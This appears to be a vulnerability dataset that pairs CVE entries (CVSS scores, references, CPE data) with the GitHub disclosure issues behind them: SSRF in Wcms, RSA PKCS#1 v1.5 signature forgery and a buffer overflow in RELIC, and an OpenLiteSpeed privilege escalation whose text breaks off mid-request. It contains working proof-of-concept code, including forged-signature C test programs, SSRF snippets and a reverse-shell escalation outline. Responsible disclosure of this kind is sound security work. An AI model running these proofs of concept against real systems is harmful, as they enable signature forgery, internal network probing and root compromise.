Hi, dev team! There is SSRF Vulnerability in `wcms/wcms/wex/cssjs.php` file. The vulnerable code is: 31: `$path = $_GET['path'];` 32: `$html_from_template = htmlspecialchars(file_get_contents($path));` 61: `:code='<?php echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);?>'` Example POC: ``` <?php $path = "ftp://127.0.0.1:8000"; $html_from_template = htmlspecialchars(file_get_contents($path)); echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES); ?> ``` Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back-end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using `gopher://` scheme) To prevent vulnerability use next manual: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html Please let me know about any fixes, I would like to register CVE number.
SSRF Vulnerability in wcms/wcms/wex/cssjs.php
https://api.github.com/repos/vedees/wcms/issues/8/comments
1
2020-07-20T15:05:53Z
2020-07-21T12:27:41Z
https://github.com/vedees/wcms/issues/8
661,929,973
8
1,802
CVE-2020-24140
2021-04-07T16:15:13.167
Server-side request forgery in Wcms 0.3.2 let an attacker send crafted requests from the back-end server of a vulnerable web application via the pagename parameter to wex/html.php. It can help identify open ports, local network hosts and execute command on local services.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24140.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24140.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wcms:wcms:0.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "95CE7D1E-E919-449E-88D4-F6A0FCADFAF0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/vedees/wcms/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "vedees", "wcms" ]
Hi, dev team! There is SSRF Vulnerability in `wcms/wcms/wex/html.php` file. The vulnerable code is: wcms/wex/core/classes/Pagename.php:16: `$_SESSION['pagename'] = $_POST['pagename'];` wcms/wex/core/classes/Pagename.php:20: `$GLOBALS['pagename'] = $_SESSION['pagename'];` wcms/wex/html.php:17: `$html_from_template = htmlspecialchars(file_get_contents($GLOBALS['pagename']));` Example POC: ``` <?php $pagename = "ftp://127.0.0.1:8000"; $html_from_template = htmlspecialchars(file_get_contents($pagename)); ?> ``` Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back-end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using `gopher://` scheme) To prevent vulnerability use next manual: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html Please let me know about any fixes, I would like to register CVE number.
SSRF Vulnerability in wcms/wcms/wex/html.php
https://api.github.com/repos/vedees/wcms/issues/11/comments
1
2020-07-20T15:22:21Z
2020-07-21T12:21:47Z
https://github.com/vedees/wcms/issues/11
661,947,563
11
1,803
CVE-2020-36315
2021-04-07T21:15:15.870
In RELIC before 2020-08-01, RSA PKCS#1 v1.5 signature forgery can occur because certain checks of the padding (and of the first two bytes) are inadequate. NOTE: this requires that a low public exponent (such as 3) is being used. The product, by default, does not generate RSA keys with such a low number.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/commit/76c9a1fdf19d9e92e566a77376673e522aae9f80" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/issues/154" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/tree/32eb4c257fc80328061d66639b1cdb35dbed51a2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/commit/76c9a1fdf19d9e92e566a77376673e522aae9f80" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/issues/154" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/tree/32eb4c257fc80328061d66639b1cdb35dbed51a2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:relic_project:relic:*:*:*:*:*:*:*:*", "matchCriteriaId": "30E26998-9B9A-4DAD-BCBA-1022C26623C7", "versionEndExcluding": "2020-08-01", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "327" ]
327
https://github.com/relic-toolkit/relic/issues/154
[ "Exploit", "Third Party Advisory" ]
github.com
[ "relic-toolkit", "relic" ]
Hi there, As I was testing the PKCS1v1.5 implementation inside RELIC, it appears to me that it might be susceptible to a Bleichenbacher-style small exponent signature forgery. In a nut shell, there are mainly 2 issues in the code (both in `relic_cp_rsa.c`) that enables the attack: 1. The checks on the first 2 bytes to see whether they are indeed `0x00 | 0x01` actually doesn't lead to rejection of malformed inputs. Although [line 345](https://github.com/relic-toolkit/relic/blob/master/src/cp/relic_cp_rsa.c#L345) and [line 351](https://github.com/relic-toolkit/relic/blob/master/src/cp/relic_cp_rsa.c#L351) will set `result = RLC_ERR` if the prefix bytes do not match the expectation, the `result` variable is never checked later and will get overwritten on [line 374](https://github.com/relic-toolkit/relic/blob/master/src/cp/relic_cp_rsa.c#L374), hence the **first 2 bytes can take any arbitrary values** and the signature verification will still go through. 1. More importantly, the `do{ ... } while` loop on [line 357](https://github.com/relic-toolkit/relic/blob/master/src/cp/relic_cp_rsa.c#L357) only checks that the padding has not been terminated with a zero, but it doesn't actually require the each of the padding bytes to be `0xFF`, and because of this, the **padding can take arbitrary non-zero values** and the signature verification will still go through. Together, this opens up the possibility of a Bleichenbacher-style small exponent signature forgery. Here is a proof-of-concept forgery attack, based on the `test_cp.c` given in the source tree: ```C /** * @file * * Tests for implementation of cryptographic protocols. * * @version $Id$ * @ingroup test */ #include <stdio.h> #include "relic.h" #include "relic_test.h" #define MODULUS_SIZE_IN_BITS RLC_BN_BITS #define MSG "hello world" static int rsa(void) { int code = RLC_ERR; uint8_t sig[MODULUS_SIZE_IN_BITS / 8 + 1] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3f, 0x4a, 0xaf, 0xb8, 0x5f, 0xc2, 0x18, 0xd1, 0xf8, 0x39, 0x09, 0x15, 0x71, 0x0f, 0x6d, 0xc2, 0x93, 0x61, 0x55, 0xd9, 0x36, 0xbd, 0xae, 0xbe, 0x84, 0x60, 0x9b, 0xfa, 0x5c, 0xe4, 0x52, 0x27, 0xde, 0x78, 0x02, 0xcc, 0xd0, 0xa6, 0xee, 0x67, 0x94, 0x9d, 0xfd, 0x92, 0x85, 0x4f, 0x08, 0x35, 0x7f, 0x20, 0x2b, 0x55, 0x12, 0x1b, 0x81, 0xbf, 0xc2, 0x31, 0x1c, 0x2d, 0x95, 0x20, 0xff, 0x88, 0x3c, 0x3c, 0x24, 0x37, 0x1f, 0x2f, 0x68, 0xd4, 0x8b, 0xd0, 0x00, 0x19, 0xbb, 0x83, 0x0b, 0xc7, 0x3f, 0x55, 0xf4, 0x40, 0x3d, 0x9e, 0x31, 0x8a, 0x36, 0xbe, 0x67, 0x6c, 0x97, 0x27, 0x9f, 0xa8, 0x52, 0xbb, 0x3e, 0xb6, 0x63, 0xaa, 0x2b, 0xb9 }; int ol = MODULUS_SIZE_IN_BITS / 8 + 1; rsa_t pub; rsa_null(pub); RLC_TRY { rsa_new(pub); // set e to 3 bn_set_2b(pub->e, 1); bn_add_dig(pub->e, pub->e, 1); // set n bn_read_str(pub->crt->n, "af5110f2c75400a4ceb31b3763303f71b6ee517dad3b108fd4b675774c9e2d5649784c2b3ba6b93b80175c79db9619b73b5b1e575f65faadfc613fa00b449895407ff696581eb7f76074b5857973db2b652da5df6198579784d959ee09e64424d3bb996310e8e84b8769a0d0e48d16608b56cb495bd0b5eb8f8267021469e0ade8c2d22d66ecd9a32067544e97c2ccc6ad115ca4e32f117ac34c5ceb0c0d0781af8e7f79d9950458a24b9e7c5ed645a75abee52cabf174d294219afedd8e78afd7386c627a0033cef568c09c08202a9a0a2f4409df0902e8345017504e7b50dbda99f5dc8212a99ca1dfad7434caab6013249e12cc98d8731fed698b9f667984dd1f89af5c33d84a7995062c4b92b49559154c3ee8b5f77ed48d50c391492325a027fe19cdb07bd103434627d14aec25a63a822025137649", 624, 16); TEST_BEGIN("rsa signature/verification is correct") { TEST_ASSERT(cp_rsa_ver(sig, ol, MSG, strlen(MSG), 0, pub) == 1, end); } TEST_END; } RLC_CATCH_ANY { RLC_ERROR(end); } code = RLC_OK; end: rsa_free(pub); return code; } int main(void) { if (core_init() != RLC_OK) { core_clean(); return 1; } util_banner("Tests for the CP module", 0); #if defined(WITH_BN) util_banner("Protocols based on integer factorization:\n", 0); if (rsa() != RLC_OK) { core_clean(); return 1; } #endif util_banner("All tests have passed.\n", 0); core_clean(); return 0; } ``` For convenience I used a somewhat unconventional sized (2496-bit long) modulus. I used OpenSSL to generate it, but you can try it with a different 2496-bit long modulus and the forged signature should still work. The forgery algorithm should also work against "regular" sized (e.g. 2048-bit and 4096-bit long) moduli, though I have yet to have a chance to work on that, and I think the above proof-of-concept already serves the purpose. Such a forgery should only work when `e` is small enough (which in most cases means `e = 3`), and although RELIC by default doesn't generate RSA keys with `e = 3`, there is a possibility that someone might use `e = 3` for specific application & interoperability needs, and nothing in the API is prohibiting the programming from doing it. In any case, unless the plan is to completely drop the support of PKCS1v1.5, I'd suggest to have the issues in `relic_cp_rsa.c` fixed, as it is definitely possible (and not really that difficult) to make the signature verification much more robust. More details on the Bleichenbacher-style signature forgery can be found in academic papers like [this](https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_04A-4_Chau_paper.pdf) and [this](https://www-old.cdc.informatik.tu-darmstadt.de/reports/reports/sigflaw.pdf). Finally, though it shouldn't matter much, this is the script I used (`preset/debug.sh`) to configure the build: ```bash #!/bin/bash cmake -DCHECK=on \ -DALLOC=DYNAMIC \ -DCOLOR=off \ -DUSEENVCFLAGS=1 \ -DWSIZE=8 \ -DARCH= \ -DDEBUG=on \ -DSHLIB=on \ -DSTLIB=on \ -DTESTS=1 \ -DBENCH=0 \ -DWITH=ALL \ -DBN_PRECI=2496 \ -DCP_RSAPD=PKCS1 \ $1 ```
PKCS1v1.5 implementation and Bleichenbacher-style small exponent signature forgery
https://api.github.com/repos/relic-toolkit/relic/issues/154/comments
1
2020-06-29T14:10:21Z
2020-08-01T23:58:41Z
https://github.com/relic-toolkit/relic/issues/154
647,410,334
154
1,804
CVE-2020-36316
2021-04-07T21:15:15.933
In RELIC before 2021-04-03, there is a buffer overflow in PKCS#1 v1.5 signature verification because garbage bytes can be present.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/commit/76c9a1fdf19d9e92e566a77376673e522aae9f80" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/issues/155" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/tree/32eb4c257fc80328061d66639b1cdb35dbed51a2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/commit/76c9a1fdf19d9e92e566a77376673e522aae9f80" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/issues/155" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/relic-toolkit/relic/tree/32eb4c257fc80328061d66639b1cdb35dbed51a2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:relic_project:relic:*:*:*:*:*:*:*:*", "matchCriteriaId": "AB83889A-E54A-4F33-A734-3C1CFCA20EBB", "versionEndExcluding": "2021-04-03", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/relic-toolkit/relic/issues/155
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "relic-toolkit", "relic" ]
Actually besides the problems mentioned in #154, there seems to be additional problems in the PKCS1v1.5 signature verification code that can lead to a buffer overflow attack. Although the variable `pad_len` is set according to prior knowledge on [line 965](https://github.com/relic-toolkit/relic/blob/master/src/cp/relic_cp_rsa.c#L965), it will actually be overwritten on [line 1000](https://github.com/relic-toolkit/relic/blob/master/src/cp/relic_cp_rsa.c#L1000) by the call to `pad_pkcs1()`. And because `pad_pkcs1()` doesn't require that the padding is 1) at least 8-byte long; 2) long enough so that there'd be no extra trailing bytes after the hash value, the value of `pad_len` can be set to a really small number when given a malformed signature with really short padding. Then on [line 1013](https://github.com/relic-toolkit/relic/blob/master/src/cp/relic_cp_rsa.c#L1013) it is possible to have `size - pad_len` to be a really large value, larger than the size of `h1` allocated on [line 949](https://github.com/relic-toolkit/relic/blob/master/src/cp/relic_cp_rsa.c#L949), which can lead to a buffer overflow. Similar problems of not requiring a padding with appropriate length was found in some other implementations before, and that can usually be exploited for signature forgery (like in [Bleichenbacher's original attack](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/)). However, in this case it will induce a buffer overflow instead because of how `pad_len` was used to calculate the size of a subsequent buffer write (though I suspect the variable `result` might be set to `RLC_EQ` after [line 1033](https://github.com/relic-toolkit/relic/blob/master/src/cp/relic_cp_rsa.c#L1033)). Here's a proof-of-concept code demonstrating the problem, which should give a Segmentation Fault upon the completion of the signature verification: ```C /** * @file * * Tests for implementation of cryptographic protocols. * * @version $Id$ * @ingroup test */ #include <stdio.h> #include "relic.h" #include "relic_test.h" #define MODULUS_SIZE_IN_BITS RLC_BN_BITS #define MSG "hello world" static int rsa(void) { int code = RLC_ERR; uint8_t sig[MODULUS_SIZE_IN_BITS / 8 + 1] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xaa, 0xea, 0xec, 0x40, 0x11, 0x5d, 0x29, 0x07, 0xe3, 0x54, 0xcf, 0xc3, 0xe6, 0x95, 0x59, 0x3a, 0x73, 0x6b, 0x6b, 0x41, 0x17, 0x29, 0x0d, 0xc3, 0x6e, 0x90, 0xde, 0x3e, 0x69, 0x54, 0xb4, 0xa5, 0xb9, 0x58, 0x51, 0x44, 0x6b, 0xf3, 0xec, 0x23, 0x6c, 0x39, 0xc8, 0x2c, 0xa8, 0xad, 0x9c, 0x3a, 0x5d, 0x94, 0xef, 0x89, 0x60, 0xd5, 0x4b, 0x04, 0xff, 0x6b, 0xf1, 0xca, 0x35, 0x0e, 0xdb, 0x86, 0x2f, 0x92, 0xa0, 0xf6, 0xd9, 0x24, 0xd5, 0xff, 0x2a, 0x43, 0xd0, 0xe8, 0x6b, 0x9e, 0xbc, 0x18, 0x80, 0x4c, 0xd2, 0xea, 0xb1, 0x24, 0xfc, 0x7c, 0xfb, 0xac, 0xbb, 0x8b, 0x90, 0x9f, 0x29, 0x7c, 0x8a }; int ol = MODULUS_SIZE_IN_BITS / 8 + 1; rsa_t pub; rsa_null(pub); RLC_TRY { rsa_new(pub); // set e to 3 bn_set_2b(pub->e, 1); bn_add_dig(pub->e, pub->e, 1); // set n bn_read_str(pub->crt->n, "af5110f2c75400a4ceb31b3763303f71b6ee517dad3b108fd4b675774c9e2d5649784c2b3ba6b93b80175c79db9619b73b5b1e575f65faadfc613fa00b449895407ff696581eb7f76074b5857973db2b652da5df6198579784d959ee09e64424d3bb996310e8e84b8769a0d0e48d16608b56cb495bd0b5eb8f8267021469e0ade8c2d22d66ecd9a32067544e97c2ccc6ad115ca4e32f117ac34c5ceb0c0d0781af8e7f79d9950458a24b9e7c5ed645a75abee52cabf174d294219afedd8e78afd7386c627a0033cef568c09c08202a9a0a2f4409df0902e8345017504e7b50dbda99f5dc8212a99ca1dfad7434caab6013249e12cc98d8731fed698b9f667984dd1f89af5c33d84a7995062c4b92b49559154c3ee8b5f77ed48d50c391492325a027fe19cdb07bd103434627d14aec25a63a822025137649", 624, 16); TEST_BEGIN("rsa signature/verification is correct") { TEST_ASSERT(cp_rsa_ver(sig, ol, MSG, strlen(MSG), 0, pub) == 1, end); } TEST_END; } RLC_CATCH_ANY { RLC_ERROR(end); } code = RLC_OK; end: rsa_free(pub); return code; } int main(void) { if (core_init() != RLC_OK) { core_clean(); return 1; } util_banner("Tests for the CP module", 0); #if defined(WITH_BN) util_banner("Protocols based on integer factorization:\n", 0); if (rsa() != RLC_OK) { core_clean(); return 1; } #endif util_banner("All tests have passed.\n", 0); core_clean(); return 0; } ```
buffer overflow in PKCS1v1.5 signature verification
https://api.github.com/repos/relic-toolkit/relic/issues/155/comments
2
2020-06-29T14:31:53Z
2024-12-27T15:06:08Z
https://github.com/relic-toolkit/relic/issues/155
647,426,752
155
1,805
CVE-2021-26758
2021-04-07T21:15:16.090
Privilege Escalation in LiteSpeed Technologies OpenLiteSpeed web server version 1.7.8 allows attackers to gain root terminal access and execute commands on the host system.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://docs.unsafe-inline.com/0day/openlitespeed-web-server-1.7.8-command-injection-to-privilege-escalation-cve-2021-26758" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/litespeedtech/openlitespeed/issues/217" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49556" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://docs.unsafe-inline.com/0day/openlitespeed-web-server-1.7.8-command-injection-to-privilege-escalation-cve-2021-26758" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/litespeedtech/openlitespeed/issues/217" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49556" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:litespeedtech:openlitespeed:1.7.8:*:*:*:*:*:*:*", "matchCriteriaId": "646745C0-EFF6-4F39-82E2-43C5368A1F27", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "269" ]
269
https://github.com/litespeedtech/openlitespeed/issues/217
[ "Exploit", "Third Party Advisory" ]
github.com
[ "litespeedtech", "openlitespeed" ]
# Description I found a way to escalate privileges on Ubuntu 18.04 via OpenLiteSpeed web server that runs with *user(nobody):group(nogroup)* privilege . According to this vulnerability , system user that has admin panel credentials can add himself to sudo group or shadow group( to read /etc/shadow file) . So that the user can execute command with high privileges. ## Proof of Concept 1) There is a **test** user that is not member of sudo group. ![resim](https://user-images.githubusercontent.com/76125965/106387485-09559480-63eb-11eb-99ec-27495fe26b2e.png) 2) User changes External App configuration as following to get reverse shell with high privileges. ![resim](https://user-images.githubusercontent.com/76125965/106387697-f3949f00-63eb-11eb-8b2b-44927242b863.png) ![resim](https://user-images.githubusercontent.com/76125965/106387706-11fa9a80-63ec-11eb-9ffb-fb6e658763e9.png) ``` (POST) HTTP Request: POST /view/confMgr.php HTTP/1.1 Host: localhost:7080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html, */*; q=0.01 Accept-Language: 